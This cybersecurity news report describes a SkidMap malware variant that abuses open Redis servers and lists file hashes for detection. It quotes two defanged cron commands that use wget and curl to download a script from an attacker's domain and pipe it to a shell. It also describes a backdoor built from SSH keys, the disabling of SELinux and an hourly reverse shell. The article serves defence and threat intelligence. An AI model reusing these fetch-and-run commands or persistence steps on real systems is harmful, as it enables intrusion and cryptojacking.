According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems.
Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules.
However, this malware’s recent version seems quite sophisticated and targets only open Redis instances.
Further analysis of the new variant on SkidMap revealed activities like adaptation to the operating system where it gets executed and choosing the binary to download based on the Linux Distribution architecture on the infected system.
Initially, the threat actor attempts to login to open Redis instances for setting up cron tasks with a variable using base64 string. These strings consist of two cron tasks to run a “wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | sh) and “curl” (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh)command that gets executed at a 10 minute interval for downloading the dropper scripts ‘b’, ‘c’ and ‘f’.
The dropper scripts are used to download an executable binary file (ELF) ‘gif’ (previous version used ‘jpeg’) to the ‘/var/lib/’ directory, which is the trojan file.
This trojan initially adds some SSH keys in the standard locations ‘/root/.ssh/authoried_keys’ and ‘/root/.ssh/authoried_keys2’. This is done to leave a backdoor for threat actors to login to the system.
Further actions include checking the status of SElinux (Security-Enhanced Linux) module, which is used to implement access control security policies and disable it permanently. After this, the trojan is made permanent by making specific modifications on the host OS.
The trojan creates a reverse shell to the C2 server of the attackers every hour through the TCP/8443 port. The gif binary is found to be targeting linux distributions like Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock.
A complete report has been published by Trustwave, which provides a complete explanation on the threat actors’ tactics, methods, source code, and other analysis.
File Name | Hash Type | Hashes |
b, c, f | MD5 | 000916c60b2ab828ba8cea914c308999 |
SHA1 | 9970809e1dedce286888f7d25790b4dcca1e704b | |
SHA256 | 969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725 | |
gif | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
jpeg | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
.miner | MD5 | 44de739950eb4a8a3552b4e1987e8ec2 |
SHA1 | 0ae049aab363fb8d2e164150dffbafd332725e00 | |
SHA256 | 9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28 |
Keep informed about the latest Cyber Security News by following us on GoogleNews, Linkedin, Twitter, and Facebook.
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…